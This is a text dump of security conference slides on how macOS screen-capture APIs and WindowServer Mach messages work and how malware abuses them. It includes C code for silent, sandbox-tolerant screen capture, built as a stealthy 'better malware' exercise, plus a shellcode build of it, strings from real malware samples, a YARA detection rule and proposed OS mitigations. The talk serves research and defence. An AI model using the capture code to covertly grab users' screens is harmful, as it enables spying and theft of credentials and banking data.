SlideShare a Scribd company logo

Who moved my pixels?!

Mikhail Sosonkin
Mikhail Sosonkin

From banking details to glimpses of passwords, there are lots valuable data elements on your screen. Unfortunately, as far as Apple’s Mac is concerned this information is up for grabs to whoever gets there first. This is due to the lack of protections surrounding the pixel grabbing API’s of the operating system. With ease of access to computer vision libraries and services, attackers can track screens at scale to pick out only the useful information. Apple ships a screen capture utility to make it easy for the user to take screenshots. In this presentation, we will lift the bonnet of this utility to learn about the API’s surrounding screen grabbing. Armed with the knowledge, we will explore discovered malware that takes screenshots. Then, we will build better, stealthier malware as an educational exercise. And finally, we will explore some options for improving security of the operating system so that the user can continue enjoying the convenience of taking screenshots but malware would have to work harder.

Software
1 of 48
Download to read offline
Who moved my pixels?!
Mikhail Sosonkin @hexlogic http://debugtrap.com User info id I’m on TV!!
“Synack leverages the best combination of humans and technology to discover security vulnerabilities in our customers’ web apps, mobile apps, IoT devices and infrastructure endpoints”
● Pranking ● Hacktivism ● Ransom ● Compute theft ● Espionage ● Financial theft ● For educational purposes! Why malware? Motives and intent
Inspiration outline Examination Construction Detection Retrospection Protection Celebration
● Reported by Kaspersky in May 2018 ● Android based malware ● Targeted middle eastern phones ● Focuses on information theft ○ Exfiltration via HTTP GET request parameters ● Distributed via Watering Holes ○ Alnaharegypt[.]com - with an iframe to malicious APK. ZooPark the inspiration
● Version 1 ○ Contacts/Accounts ● Version 2 ○ Call logs/GPS Location ○ SMS Messages/Device Information ● Version 3 ○ Audio Call Records ○ Installed Application Details ○ Browser Data - bookmarks & History ○ Photos & Pictures from memory card ● Version 4 (suspected to be outsourced) ○ Keylogs/Clip data ○ Arbitrary file/folders ○ Capturing photos/videos/audio/ screenshots/screen records ○ External Application data (Telegram, WhatsApp, IMO, Chrome) ○ Remote Shell/Silently Sending SMS/Making phone calls ZooPark features F536BC5B79C16E9A84546C2049E810E1 Android screencapture malware in not unique! (July 2017)
How do you capture screens? on OS X
$ otool -L /usr/sbin/screencapture /usr/sbin/screencapture: /System/Library/PrivateFrameworks/SkyLight.framework/Versions/A/SkyLight /System/Library/Frameworks/CoreGraphics.framework/Versions/A/CoreGraphics Which screencapture an overview The "bin" version contains general-use programs, while the "sbin" version contains programs that're generally only used for system administration. http://www.westwind.com/reference/OS-X/invisibles.html $ codesign -d --entitlements - `which screencapture` Executable=/usr/sbin/screencapture Libraries with the relevant functions: _CGDisplayCreateImage (CoreGraphics) -> _SLSHWCaptureDesktop (SkyLight) Maps to _XHWCaptureDesktop in server-side SkyLight Shared with WindowServer! No Special entitlements!
Mach based IPC mig Mach 3 Server Writer’s Guide: http://shakthimaan.com/downloads/hurd/server_writer.pdf $ jtool -arch x86_64 -q -d __DATA.__const /System/Library/PrivateFrameworks/SkyLight.framework/SkyLight | grep "MIG sub" Dumping from address 0x29fda0 (Segment: __DATA.__const) to end of section Address : 0x29fda0 = Offset 0x2a0da0 0x2a0608: 68 74 00 00 a9 74 00 00 MIG subsystem 29800 (65 messages) 0x2a10c0: 48 71 00 00 57 71 00 00 MIG subsystem 29000 (15 messages) 0x2a13a8: 10 72 00 00 0b 74 00 00 MIG subsystem 29200 (507 messages) $ jtool -arch x86_64 -q -d __DATA.__const /System/Library/PrivateFrameworks/SkyLight.framework/SkyLight | grep 29482 Dumping from address 0x29fda0 (Segment: __DATA.__const) to end of section Address : 0x29fda0 = Offset 0x2a0da0 0x2a3fd8: c4 36 04 00 00 00 00 00 __XHWCaptureDesktop (MIG_Msg_29482_handler)
Highlevel the utility WindowServerLaunchd Bootstrap lookup: com.apple.windowserver.active Windowserver port 5 shutter sound Hey there on port 5 Hey, talk on port 6 Give me all pixels Sure, find at memory 0xF mach_vm_map 0xF Zzzz Output to file descriptor Shared object This is fine More details: http://debugtrap.com/2018/04/01/screencapure/
Into the bytes 1) Find ports __text:34A6 _CGSLookupServerRootPort proc near ; CODE XREF: _get_session_port+1Fp ; _CGSLookupServerPort+A5p ... __text:34A6 lookup_result = dword ptr -38h __text:34A6 special_port = dword ptr -34h ... __text:34C8 lea rdx, [rbp+special_port] ; special_port __text:34CC mov dword ptr [rdx], 0 __text:34D2 mov r13, cs:_mach_task_self__ptr __text:34D9 mov edi, [r13+0] ; task __text:34DD mov esi, 4 ; which_port __text:34E2 call _task_get_special_port __text:34E7 mov ebx, eax __text:34E9 test ebx, ebx __text:34EB jnz loc_35ED __text:34F1 mov edi, [rbp+special_port] __text:34F4 test edi, edi __text:34F6 jz loc_35ED __text:34FC lea rdx, [rbp+lookup_result] __text:3500 mov dword ptr [rdx], 0 __text:3506 lea r14, aCom_apple_w_21 ; "com.apple.windowserver.active" __text:350D xor ecx, ecx __text:350F mov r8d, 8 __text:3515 mov rsi, r14 __text:3518 call _bootstrap_look_up2 mach_port_t self = mach_task_self(); task_get_bootstrap_port(self, &bs_port); // find the server port if(bootstrap_look_up(bs_port, "com.apple.windowserver.active", &serv_port) == KERN_SUCCESS) { printf("Server port: 0x%08Xn", serv_port); } else { printf("Error looking up server" " portn"); exit(2); }
// __CGSNewConnectionPort mach_msg_header_t* req_port = (mach_msg_header_t*)buffer; req_port->msgh_bits = 0x80001513; req_port->msgh_size = 1; req_port->msgh_remote_port = serv_port; req_port->msgh_local_port = mig_get_reply_port(); req_port->msgh_voucher_port = 0; req_port->msgh_id = 0x7468; uint32_t* values = (uint32_t*) (buffer + sizeof(mach_msg_header_t)); values[1] = port_right; // set the voucher voucher_mach_msg_set(req_port); mach_msg_return_t ret = mach_msg(req_port, 0x3, 0x48, 60, req_port->msgh_local_port, 0, 0); mach_port_t session_port = ( (mach_port_t*)buffer )[7]; __text:5394 __CGSNewConnectionPort proc near ; CODE XREF: _SLSNewConnection+1DDp ; _SLSNewConnection+240p ... __text:5430 mov [rbp+msg.msgh_bits], 80001513h __text:543A mov [rbp+msg.msgh_remote_port], r12d __text:5441 call _mig_get_reply_port __text:5446 mov [rbp+msg.msgh_local_port], eax __text:544C mov [rbp+msg.msgh_id], 7468h __text:5456 mov [rbp+msg.msgh_reserved], 0 __text:5460 cmp cs:_voucher_mach_msg_set_ptr, 0 __text:5468 jz short loc_547D __text:546A lea r14, [rbp+msg] __text:5471 mov rdi, r14 __text:5474 call _voucher_mach_msg_set __text:5479 mov eax, [r14+0Ch] __text:547D loc_547D: __text:547D mov [rsp+480h+notify], 0 ; notify __text:5484 lea rdi, [rbp+msg] ; msg __text:548B mov esi, 3 ; option __text:5490 mov ecx, 3Ch ; '<' ; rcv_size __text:5495 xor r9d, r9d ; timeout __text:5498 mov r8d, eax ; rcv_name __text:549B mov edx, ebx ; send_size __text:549D call _mach_msg Into the bytes 2) make session
Into the bytes 3) get pixels __text:1F796C _SLSHWCaptureDesktop proc near ; CODE XREF: _SLDisplayCreateImage+1Dp ; _SLDisplayCreateImageForRect+F7p ... __text:1F8364 mov dword ptr [rbp+msg_body10_var_80 +4], eax __text:1F8367 mov [rbp+msg.msgh_bits ], 1513h __text:1F8371 mov eax, [rbp+remote_port ] __text:1F8377 mov [rbp+msg.msgh_remote_port ], eax __text:1F837D call _mig_get_reply_port __text:1F8382 mov [rbp+msg.msgh_local_port ], eax __text:1F8388 mov [rbp+msg.msgh_id], 732Ah __text:1F8392 mov [rbp+msg.msgh_reserved ], 0 __text:1F839C cmp cs:_voucher_mach_msg_set_ptr , 0 __text:1F83A4 jz short loc_1F83B8 __text:1F83A6 lea rdi, [rbp+msg] __text:1F83AD call _voucher_mach_msg_set __text:1F83B2 mov eax, [rbp+msg.msgh_local_port ] __text:1F83B8 loc_1F83B8 : __text:1F83B8 sub rsp, 8 __text:1F83BC mov esi, 3 ; option __text:1F83C1 mov edx, 72 ; send_size __text:1F83C6 mov ecx, 136 ; rcv_size __text:1F83CB xor r9d, r9d ; timeout __text:1F83CE lea rdi, [rbp+msg] ; msg __text:1F83D5 mov r8d, eax ; rcv_name __text:1F83D8 push 0 ; notify __text:1F83DA call _mach_msg struct req_msg* rq_msg = (struct req_msg*)buffer; // ... rq_msg->header.msgh_id = 0x732A; // x, y, width, height rq_msg->x = 0.0; rq_msg->y = 0.0; rq_msg->width = 1024.0; rq_msg->height = 768.0; // display id values (vm: 0x5b81c5c0, non-vm: 0x042499b0) rq_msg->display_id = 0x042499b0; rq_msg->param5 = 0x00000441; // set the voucher voucher_mach_msg_set(&rq_msg->header); if(mach_msg(&rq_msg->header, 0x3, 0x48, 0x88, rq_msg->header.msgh_local_port, 0, 0) != MACH_MSG_SUCCESS) {} mig_put_reply_port(rq_msg->header.msgh_local_port); uint32_t object = *(uint32_t*) ( ((u_char*)buffer) + sizeof(mach_msg_header_t) + 4); if(mach_vm_map(self, rq_msg, size, 0, 0x1, object, 0x0, false, 3, 3, true) != KERN_SUCCESS) { }
Putting it all together Write better malware void doCGCapture() { CGDirectDisplayID displays[256]; uint32_t dispCount = 0; CGGetActiveDisplayList(256, displays, &dispCount); for(int i = 0; i < dispCount ; i++) { CGDirectDisplayID dispId = displays [i]; CGImageRef img = CGDisplayCreateImage(dispId); char path_str[1024]; snprintf(path_str, 1023, "./image%d.png", i); CFURLRef path = CFURLCreateWithFileSystemPath (NULL, __CFStringMakeConstantString (path_str ), kCFURLPOSIXPathStyle , false); CGImageDestinationRef destination = CGImageDestinationCreateWithURL( path, CFSTR("public.png"), 1, NULL); CGImageDestinationAddImage(destination, img, nil); CGImageDestinationFinalize(destination); } } List all displays Create image from display Encode and write image to file No Shutter sound (-x)!
Sniffing mach via injection $ DYLD_INSERT_LIBRARIES=xpcsnoop.dylib ScreenShotTester Packet Number (mach_msg): 44 0 mach_snoop.dylib 0x00000001098806b0 my_mach_msg + 112 1 SkyLight 0x00007fff4bde7e4b SLSHWCaptureDesktop + 2675 2 SkyLight 0x00007fff4bdeaf86 SLDisplayCreateImage + 34 3 ScreenShotTester 0x0000000109874b7a capture_id + 42 4 ScreenShotTester 0x0000000109874db2 doCGCapture + 210 5 ScreenShotTester 0x0000000109874e1f main + 47 6 libdyld.dylib 0x00007fff51dc3015 start + 1 thread id: 2372 msgh_bits: 131513 msgh_size: 0 (fcn param: 72) ports: 607 -> 2713 msgh_reserved: B03 msgh_id: 732A mach_msg: 0000 13 15 13 00 00 00 00 00 | 13 27 00 00 07 06 00 00 .........'...... 0010 03 0b 00 00 2a 73 00 00 | 00 00 00 00 01 00 00 00 ....*s.......... 0020 00 00 00 00 00 00 00 00 | 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 40 9a 40 | 00 00 00 00 00 68 90 40 .....@.@.....h.@ 0040 bd f9 d7 7b 41 04 00 00 ...{A... static const interpose_t interposing_functions[] __attribute__ ((used,section("__DATA, __interpose"))) = { { (void*) my_bootstrap_look_up2, (void*)bootstrap_look_up2 }, { (void*) my_mach_msg, (void*)mach_msg }, { (void*) my_mach_msg_overwrite, (void*)mach_msg_overwrite }}; Inject and intercept mach related function calls. Preferably on a small set of API’s due to volume of messages
1. msgh_id = 0x7152 // start a session 2. msgh_id = 0x7148 // test connection, get MIG version 3. msgh_id = 0x7475 // display state, find the display ID 4. msgh_id = 0x7468 // create secondary session 5. msgh_id = 0x732A // request screen pixels 6. mach_vm_map // map pixels to local process memory Mach msg sequence MIG
There is more than one way There usually is! CGImageRef screenshot = CGWindowListCreateImage( CGRectInfinite, kCGWindowListOptionOnScreenOnly, kCGNullWindowID, kCGWindowImageDefault); NSBitmapImageRep *bitmapRep = [[NSBitmapImageRep alloc] initWithCGImage:screenshot]; https://krausefx.com/blog/mac-privacy-sandboxed-mac-apps-can-take-screenshots rdar://37423927
The sandbox will protect me sometimes
Malware in action video demo 1. Cocoa base application 2. Runs in a full sandbox 3. File write allowed for demo
(allow mach-lookup (global-name "com.apple.windowserver.active")) ● cdm.sb: ○ Content Decryption Module (CDM). A CDM is required for a media renderer, audio decoder or video decoder to handle protected content (chromium). ● gpu_v2.sb ○ Allow communication between the GPU process and the UI server. ● ppapi_v2.sb ○ Pepper Plugin API (PPAPI) was initially only supported by Google Chrome and Chromium. Later, other Chromium-based browsers such as Opera and Vivaldi, also added PPAPI plugin support. Sandbox Chrome https://www.chromium.org/developers/design-documents/sandbox/osx-sandboxing-design
// The "Safe Mode" Flash NPAPI plugin process profile static const char flashPluginSandboxRules[] = R"SANDBOX_LITERAL( ; Services (allow mach-lookup (global-name "com.apple.windowserver.active") Sandbox firefox static const char widevinePluginSandboxRulesAddend[] = R"SANDBOX_LITERAL( (allow mach-lookup (global-name "com.apple.windowserver.active")) ) SANDBOX_LITERAL"; https://hg.mozilla.org/mozilla-central/file/tip/security/sandbox/mac/SandboxPolicies.h - Widevine DRM is also used with the Chromium web browser and on Android. static const char contentSandboxRules[] = R"SANDBOX_LITERAL( (version 1) (if (string=? hasWindowServer "TRUE") (allow mach-lookup (global-name "com.apple.windowserver.active")))
Sandbox Positron - a experimental, Electron-compatible runtime on top of Gecko static const char widevinePluginSandboxRulesAddend[] = "(allow mach-lookup (global-name "com.apple.windowserver.active"))n"; https://github.com/mozilla/positron/blob/master/security/sandbox/mac/Sandbox.mm - Widevine DRM is also used with the Chromium web browser and on Android. static const char contentSandboxRules[] = "(version 1)n" "n" "(define sandbox-level %d)n" " (allow mach-lookupn" " (global-name "com.apple.windowserver.active")n"
Window server gets abused a lot: https://blog.ret2.io/2018/07/25/pwn2own-2018-safari-sandbox/ Sandbox Safari - Webkit com.apple.WebProcess.sb.in: (allow mach-lookup #if __MAC_OS_X_VERSION_MIN_REQUIRED >= 101400 #else (global-name "com.apple.windowserver.active") #endif ) #if __MAC_OS_X_VERSION_MIN_REQUIRED >= 101400 (deny mach-lookup (with no-log) (global-name "com.apple.windowserver.active")) #endif com.apple.WebKit.plugin-common.sb.in: ;; Various services required by AppKit ;; and other frameworks (allow mach-lookup (global-name "com.apple.windowserver.active") https://github.com/WebKit/webkit
Why is that an issue? Protected by sandbox python extractshell.py -o screencap -s screencap.b hexdump -C screencap.b 00000000 55 41 57 41 56 41 55 41 54 53 48 81 ec 48 08 00 |UAWAVAUATSH..H..| 00000010 00 31 ed 48 8d 5c 24 34 89 2b 4c 8d 74 24 2c 41 |.1.H.$4.+L.t$,A| 00000020 89 2e 4c 8b 25 6c 06 00 00 41 8b 3c 24 be 04 00 |..L.%l...A.<$...| … 000003f0 40 13 15 00 00 89 44 24 48 e8 45 01 00 00 89 44 |@.....D$H.E....D| 00000400 24 4c 48 b8 00 00 00 00 2a 73 00 00 48 89 44 24 |$LH.....*s..H.D$| 00000410 50 c6 44 24 5c 01 0f 57 c0 0f 29 44 24 60 0f 28 |P.D$..W..)D$`.(| … 00000510 00 00 00 63 6f 6d 2e 61 70 70 6c 65 2e 77 69 6e |...com.apple.win| 00000520 64 6f 77 73 65 72 76 65 72 2e 61 63 74 69 76 65 |dowserver.active| Shellcode can do it in about 9076 bytes mach_msg and mach_vm_map are mach system calls Can networking and windowserver be accessed at the same time? https://github.com/nologic/shellcc SHELLCC is a build environment for making shellcode in C using GCC and other binary tool. It is meant to enable people with limited knowledge of assembly to write quality shellcode as well as bring code maintainability by using a high level language.
Chrome is active: Sublime has these documents open: And now, the terminal: Efficient collection Thanks touchbar ● Screenshot of regular resolution is about: 1.4M PNG Compressed. ● An image of touchbar can be used for a more efficient selection of timing.
What malware is out there? ... in the wild
Basic triage* signatures Static analysis disassembly Static analysis partial emulation Dynamic analysis Sandboxing Dynamic analysis Emulation Manual analysis APT! rule combined_screen_cap { strings: $utility = "/usr/sbin/screencapture" nocase $lib = "CoreGraphics" $func = "CGDisplayCreateImage" $mov_msg_id = { C7 ?? 54 FF FF FF 2A 73 00 00 } $mach_msg = "_mach_msg" condition: $utility or ($lib and $func) or ($mov_msg_id and $mach_msg) } Querying for screencapture capability on VirusTotal
Finding malware thanks VT/Yara 1124 matched samples 15 Anti-virus (AV) flagged 6 Sample with great than 1 AV Great for research, need better rules for anything production Simple static signatures aren’t great for endpoint protection
while [ -z "$DONE" ]; do DONE="done" for hash in `cat hashes`; do if [ -z "`cat $hash.json`" ]; then curl -s --request POST --url 'https://www.virustotal.com/vtapi/v2/file/report' -d apikey=${APIKEY} -d "resource=$hash" > $hash.json cat $hash.json sleep 2 DONE= fi done sleep 2 done Filtering samples Getting around throttling
Meeting the malware: Mokes 664e0a048f61a76145b55d1f1a5714606953d69edccec5228017eb546049dc8c Mokes ● Uses CoreGraphics via Qt ● Specifically: QCocoaScreen::grabWindow ● Capturing Screen (every 30 sec.) QPixmap QCocoaScreen::grabWindow(WId window, int x, int y, int width, int height) const { // 128 displays should be enough // for everyone. const int maxDisplays = 128; CGDirectDisplayID displays[maxDisplays]; CGDisplayCount displayCount; ... for (uint i = 0; i < displayCount; ++i) { const CGRect bounds = CGDisplayBounds(displays[i]); ... QCFType<CGImageRef> cgImage = CGDisplayCreateImage(displays[i]); const QImage image = qt_mac_toQImage(cgImage); } }
Meeting the malware: Macs 6acd92d0dfe3e298d73b78a3dcc6d52ff4f85a70a9f2d0dcfe7ae4af2dd685cc Macs ● Uses ‘/usr/sbin/screencapture -x [] -T 20’ ● It dumps screenshots into a folder called MacApp
Meeting the malware: blackhole d1a0c589b3ac33626d47156aaa938be92ba3d6f889de5a6f62d4afe0ac2cf65a blackhole ● Comes with a PPC version ○ why?! ● /usr/sbin/screencapture -x /Applications/.JavaUpdater/.Data/Screen.png ● No one reports on screen capture capability
Meeting the malware: Eh?! f1e98602683603bab5e08de8dc00e62ae27bf4ed6164f3e45ab26628f5453481 vmdk part with malware ● I’m not malware ● Why would someone upload this to VT? ● References screencapture but nothing directly executable $ strings f1e98602683603bab5e08de8dc00e62ae27bf4ed6164f3e45ab26628f5453481 | grep screencapture Pscreencapture I,screencapture -T 0 -x 1.png/miner.sh %s %u %s %s/polipo -c polipo.cfgtcp jO/usr/sbin/screencapture/bin/sh/usr/bin/curlX-ASIHTTPRequest-Expiresm_FolderList m_zipUploadm_ComputerName_UserNamem_uploadURL/lang.php $ hexdump -C f1e98602683603bab5e08de8dc00e62ae27bf4ed6164f3e45ab26628f5453481 | head 00000000 4b 44 4d 56 01 00 00 00 03 00 00 00 00 00 7f 00 |KDMV............| 00000010 00 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 |................| 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 |................| Definitely some kind of malware in there
Meeting the malware: WINDSHIFT Need a hash Recent findings by DarkMatter at HiTB APT?
How do we find the behavior? on OS X
On the endpoint file attributes $ mdfind kMDItemIsScreenCapture = 1 /Users/nl/Desktop/Screen Shot 2018-05-15 at 10.52.35 PM.png /Users/nl/Desktop/Screen Shot 2018-04-24 at 6.26.21 PM.png /Users/nl/Desktop/Screen Shot 2018-04-24 at 6.25.52 PM.png $ ls -l@ "Screen Shot 2018-05-15 at 10.52.35 PM.png" -rw-r--r--@ 1 nl staff 120087 May 15 22:52 /Users/nl/Desktop/Screen Shot 2018-05-15 at 10.52.35 PM.png com.apple.FinderInfo 32 com.apple.lastuseddate#PS 16 com.apple.metadata:kMDItemIsScreenCapture 42 com.apple.metadata:kMDItemScreenCaptureGlobalRect 86 com.apple.metadata:kMDItemScreenCaptureType 51 $ mdls "Screen Shot 2018-05-15 at 10.52.35 PM.png" _kMDItemDisplayNameWithExtensions = "Screen Shot 2018-05-15 at 10.52.35 PM.png" kMDItemIsScreenCapture = 1 $ xattr -l "Screen Shot 2018-05-15 at 10.52.35 PM.png" com.apple.metadata:kMDItemIsScreenCapture: 00000000 62 70 6C 69 73 74 30 30 09 08 00 00 00 00 00 00 |bplist00........| 00000010 01 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 |................| 00000020 00 00 00 00 00 00 00 00 00 09 1. Who created the file? 2. Why would malware set this attribute? 3. Why would malware create a file?
$ sudo frida-trace -a 'SkyLight!43287' WindowServer Instrumenting functions... sub_43287: Auto-generated handler at "./__handlers__/SkyLight/sub_43287.js" Started tracing 1 function. Press Ctrl+C to stop. /* TID 0x307 */ 6791 ms sub_43287() On the endpoint tracing functions _XHWCaptureDesktop 1. Frida/DTrace lite-weight tracing frameworks 2. Proper debugging is too heavy 3. Thwarted by SIP on OS X (Good! But blunt)
On the endpoint who did it?! * thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1 frame #0: 0x00007fff544c3287 SkyLight`_XHWCaptureDesktop SkyLight`_XHWCaptureDesktop: -> 0x7fff544c3287 <+0>: pushq %rbp 0x7fff544c3288 <+1>: movq %rsp, %rbp 0x7fff544c328b <+4>: pushq %r15 0x7fff544c328d <+6>: pushq %r14 Target 0: (WindowServer) stopped. (lldb) x/10wx $rdi 0x7ffee4c12610: 0x00001112 0x00000048 0x000153ab 0x0001249b 0x7ffee4c12620: 0x00000000 0x0000732a 0x00000000 0x00000001 0x7ffee4c12630: 0x00000000 0x00000000 $ sudo lsmp -a Process (4460) : screencapture name ipc-object rights identifier type --------- ---------- ---------- ----------- ------------ 0x00000103 0x56e57599 send 0x00000000 TASK SELF (4460) screencapture 0x00000507 0x56e57a31 send 0x00000000 THREAD (0x7faf5) 0x00000603 0x56e56729 recv + send-once 0x000153ab (157) WindowServer 1. Breakpoint in WindowServer 2. First parameter is the mach message 3. We can see the source port 4. Using source port we can get the PID/Task of the source process
Can I defend myself? on OS X
OS Mitigations 1) proposal: logging Build a mechanism for allowing logging or trapping functions in SIP protected processes Notification popup for any app that triggered screen capture
OS Mitigations 2) proposal: filter Mach ports pass messages. It’s high time that a firewall is developed to block certain messages on demand: ○ Message ID 732Ah is a request for a screencapture. ○ Could be defined in the same way as sandbox permissions: (deny mach-msg (mach-msg-id 0x732a)) ○ Performance concerns balanced via ports/processes selection
OS Mitigations 3) proposal: permissions Only sandboxed applications with proper entitlements should be given access to API’s that access pixels of other applications.* * macOS Mojave: New data protections require apps to get user permission before using Mac camera and microphone (It’s a start)
In closing
Some malware is thorny! ... but “In particular, our study concludes that targeted malware does not use more anti-debugging and anti-VM techniques than generic malware, although targeted malware tend to have a lower antivirus detection rate.” -- “Advanced or not?..,” P. Chen, et. al.
● Lots of malware steals pixels ● Can do it direct through Mach Interfaces ● Sandboxes don’t help... Maybe a little. ● Proposed mitigations. Thoughts? Conclusion takeaways
Mikhail Sosonkin @hexlogic http://debugtrap.com Questions and Answers Thank you! :-)
● https://pixabay.com/ ● http://highlight.hohli.com/ ● Objective-See ● Objective By The Sea Thanks all!

Recommended

MongoDB Europe 2016 - Enabling the Internet of Things at Proximus - Belgium's...
MongoDB Europe 2016 - Enabling the Internet of Things at Proximus - Belgium's...MongoDB Europe 2016 - Enabling the Internet of Things at Proximus - Belgium's...
MongoDB Europe 2016 - Enabling the Internet of Things at Proximus - Belgium's...
MongoDB
 
EWD 3 Training Course Part 23: Traversing a Range using DocumentNode Objects
EWD 3 Training Course Part 23: Traversing a Range using DocumentNode ObjectsEWD 3 Training Course Part 23: Traversing a Range using DocumentNode Objects
EWD 3 Training Course Part 23: Traversing a Range using DocumentNode Objects
Rob Tweed
 
MongoDB Analytics
MongoDB AnalyticsMongoDB Analytics
MongoDB Analyticsdatablend
 
EWD 3 Training Course Part 24: Traversing a Document's Leaf Nodes
EWD 3 Training Course Part 24: Traversing a Document's Leaf NodesEWD 3 Training Course Part 24: Traversing a Document's Leaf Nodes
EWD 3 Training Course Part 24: Traversing a Document's Leaf Nodes
Rob Tweed
 
Malcon2017
Malcon2017Malcon2017
Malcon2017
Andriy Brukhovetskyy
 
Is HTML5 Ready? (workshop)
Is HTML5 Ready? (workshop)Is HTML5 Ready? (workshop)
Is HTML5 Ready? (workshop)Remy Sharp
 
Data Mangling with mongoDB the Right Way [PyData London] 2016]
Data Mangling with mongoDB the Right Way [PyData London] 2016]Data Mangling with mongoDB the Right Way [PyData London] 2016]
Data Mangling with mongoDB the Right Way [PyData London] 2016]
Alexander Hendorf
 
MongoDB - Back to Basics - La tua prima Applicazione
MongoDB - Back to Basics - La tua prima ApplicazioneMongoDB - Back to Basics - La tua prima Applicazione
MongoDB - Back to Basics - La tua prima Applicazione
Massimo Brignoli
 

Recommended

MongoDB Europe 2016 - Enabling the Internet of Things at Proximus - Belgium's...
MongoDB Europe 2016 - Enabling the Internet of Things at Proximus - Belgium's...MongoDB Europe 2016 - Enabling the Internet of Things at Proximus - Belgium's...
MongoDB Europe 2016 - Enabling the Internet of Things at Proximus - Belgium's...
MongoDB
 
EWD 3 Training Course Part 23: Traversing a Range using DocumentNode Objects
EWD 3 Training Course Part 23: Traversing a Range using DocumentNode ObjectsEWD 3 Training Course Part 23: Traversing a Range using DocumentNode Objects
EWD 3 Training Course Part 23: Traversing a Range using DocumentNode Objects
Rob Tweed
 
MongoDB Analytics
MongoDB AnalyticsMongoDB Analytics
MongoDB Analyticsdatablend
 
EWD 3 Training Course Part 24: Traversing a Document's Leaf Nodes
EWD 3 Training Course Part 24: Traversing a Document's Leaf NodesEWD 3 Training Course Part 24: Traversing a Document's Leaf Nodes
EWD 3 Training Course Part 24: Traversing a Document's Leaf Nodes
Rob Tweed
 
Malcon2017
Malcon2017Malcon2017
Malcon2017
Andriy Brukhovetskyy
 
Is HTML5 Ready? (workshop)
Is HTML5 Ready? (workshop)Is HTML5 Ready? (workshop)
Is HTML5 Ready? (workshop)Remy Sharp
 
Data Mangling with mongoDB the Right Way [PyData London] 2016]
Data Mangling with mongoDB the Right Way [PyData London] 2016]Data Mangling with mongoDB the Right Way [PyData London] 2016]
Data Mangling with mongoDB the Right Way [PyData London] 2016]
Alexander Hendorf
 
MongoDB - Back to Basics - La tua prima Applicazione
MongoDB - Back to Basics - La tua prima ApplicazioneMongoDB - Back to Basics - La tua prima Applicazione
MongoDB - Back to Basics - La tua prima Applicazione
Massimo Brignoli
 
Encryption: It's For More Than Just Passwords
Encryption: It's For More Than Just PasswordsEncryption: It's For More Than Just Passwords
Encryption: It's For More Than Just Passwords
John Congdon
 
MongoDB 3.2 - Analytics
MongoDB 3.2 - AnalyticsMongoDB 3.2 - Analytics
MongoDB 3.2 - Analytics
Massimo Brignoli
 
GraphTalk Helsinki - Fraud Analysis with Neo4j
GraphTalk Helsinki - Fraud Analysis with Neo4jGraphTalk Helsinki - Fraud Analysis with Neo4j
GraphTalk Helsinki - Fraud Analysis with Neo4j
Neo4j
 
EWD 3 Training Course Part 21: Persistent JavaScript Objects
EWD 3 Training Course Part 21: Persistent JavaScript ObjectsEWD 3 Training Course Part 21: Persistent JavaScript Objects
EWD 3 Training Course Part 21: Persistent JavaScript Objects
Rob Tweed
 
GraphTalk Stockholm - Fraud Detection with Graphs
GraphTalk Stockholm - Fraud Detection with GraphsGraphTalk Stockholm - Fraud Detection with Graphs
GraphTalk Stockholm - Fraud Detection with Graphs
Neo4j
 
Operational Intelligence with MongoDB Webinar
Operational Intelligence with MongoDB WebinarOperational Intelligence with MongoDB Webinar
Operational Intelligence with MongoDB WebinarMongoDB
 
JWT - To authentication and beyond!
JWT - To authentication and beyond!JWT - To authentication and beyond!
JWT - To authentication and beyond!
Luís Cobucci
 
IOTA MAM介紹
IOTA MAM介紹IOTA MAM介紹
IOTA MAM介紹
Zeng Jun Wei
 
Beyond php - it's not (just) about the code
Beyond php - it's not (just) about the codeBeyond php - it's not (just) about the code
Beyond php - it's not (just) about the code
Wim Godden
 
MongoDB .local Munich 2019: New Encryption Capabilities in MongoDB 4.2: A Dee...
MongoDB .local Munich 2019: New Encryption Capabilities in MongoDB 4.2: A Dee...MongoDB .local Munich 2019: New Encryption Capabilities in MongoDB 4.2: A Dee...
MongoDB .local Munich 2019: New Encryption Capabilities in MongoDB 4.2: A Dee...
MongoDB
 
MongoDB Performance Tuning
MongoDB Performance TuningMongoDB Performance Tuning
MongoDB Performance Tuning
Puneet Behl
 
Webinarserie: Einführung in MongoDB: “Back to Basics” - Teil 3 - Interaktion ...
Webinarserie: Einführung in MongoDB: “Back to Basics” - Teil 3 - Interaktion ...Webinarserie: Einführung in MongoDB: “Back to Basics” - Teil 3 - Interaktion ...
Webinarserie: Einführung in MongoDB: “Back to Basics” - Teil 3 - Interaktion ...MongoDB
 
Coding Horrors
Coding HorrorsCoding Horrors
Coding Horrors
Mark Baker
 
Geth important commands
Geth important commandsGeth important commands
Geth important commands
NexThoughts Technologies
 
MongoDB Days Silicon Valley: Data Analysis and MapReduce with MongoDB
MongoDB Days Silicon Valley: Data Analysis and MapReduce with MongoDBMongoDB Days Silicon Valley: Data Analysis and MapReduce with MongoDB
MongoDB Days Silicon Valley: Data Analysis and MapReduce with MongoDB
MongoDB
 
MongoDB Days Silicon Valley: MongoDB and the Hadoop Connector
MongoDB Days Silicon Valley: MongoDB and the Hadoop ConnectorMongoDB Days Silicon Valley: MongoDB and the Hadoop Connector
MongoDB Days Silicon Valley: MongoDB and the Hadoop Connector
MongoDB
 
Common Browser Hijacking Methods
Common Browser Hijacking MethodsCommon Browser Hijacking Methods
Common Browser Hijacking Methods
David Barroso
 
はじめてのMongoDB
はじめてのMongoDBはじめてのMongoDB
はじめてのMongoDB
Takahiro Inoue
 
Statisztikai Spamszurok 2008
Statisztikai Spamszurok 2008Statisztikai Spamszurok 2008
Statisztikai Spamszurok 2008
Janos Suto
 
MongoDB .local Munich 2019: Aggregation Pipeline Power++: How MongoDB 4.2 Pip...
MongoDB .local Munich 2019: Aggregation Pipeline Power++: How MongoDB 4.2 Pip...MongoDB .local Munich 2019: Aggregation Pipeline Power++: How MongoDB 4.2 Pip...
MongoDB .local Munich 2019: Aggregation Pipeline Power++: How MongoDB 4.2 Pip...
MongoDB
 
MongoDB dla administratora
MongoDB dla administratora MongoDB dla administratora
MongoDB dla administratora
3camp
 
Mongo db dla administratora
Mongo db dla administratoraMongo db dla administratora
Mongo db dla administratora
Łukasz Jagiełło
 

More Related Content

What's hot

Encryption: It's For More Than Just Passwords
